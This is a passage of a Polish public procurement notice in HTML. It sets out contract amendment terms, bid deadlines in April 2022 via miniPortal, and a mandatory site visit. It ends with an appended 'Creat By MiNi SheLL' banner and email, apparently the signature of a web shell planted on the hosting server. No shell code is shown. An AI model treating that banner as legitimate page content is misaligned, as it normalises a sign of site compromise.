okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, nie leżące po stronie WYKONAWCY;<br/>e)	z przyczyn niezależnych od ZAMAWIAJĄCEGO i w porozumieniu z WYKONAWCĄ ograniczenie zakresu lub rezygnacja ze zleconych usług, pociągająca za sobą zmniejszenie wynagrodzenia WYKONAWCY. <br/>f)	wcześniejsze wdrożenie i pełne uruchomienie poszczególnych funkcjonalności ESOK w stosunku do terminów przewidzianych w koncepcji wdrożenia.<br/>g) Wynagrodzenie należne WYKONAWCY może ulec zmianie w przypadku zmiany urzędowej stawki podatku VAT. W takiej sytuacji stawki netto pozostają niezmienne, a zmiana wynagrodzenia brutto dotyczyć będzie wszystkich faktur wystawionych po terminie wejścia w życie nowej stawki podatku VAT.<br/>3.	WYKONAWCA może wystąpić do ZAMAWIAJĄCEGO o zmianę terminu wykonania przedmiotu zamówienia w następujących przypadkach:<br/>a)	wystąpienia przyczyn niezależnych od obu Stron, w tym działania siły wyższej lub wystąpienia innych podobnych okoliczności, jak np. wzrost zagrożenia epidemiologicznego, wprowadzenie stanu wyjątkowego,<br/>b)	wprowadzenia przez ZAMAWIAJĄCEGO zmiany wymagań odnoszących się do przedmiotu zamówienia w trakcie jego realizacji z powodów, których nie można było wcześniej przewidzieć,<br/>c)	z przyczyn leżących po stronie ZAMAWIAJĄCEGO, których nie można było wcześniej przewidzieć. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Sposób składania ofert: przy użyciu miniPortalu (https://miniportal.uzp.gov.pl) za pomocą „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-15 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ZAMAWIAJĄCY przewiduje obowiązek odbycia przez WYKONAWCĘ wizji lokalnej na obiekcie. Ostateczny termin odbycia wizji lokalnej to 7 dni przed otwarciem ofert.

Creat By MiNi SheLL
Email: jattceo@gmail.com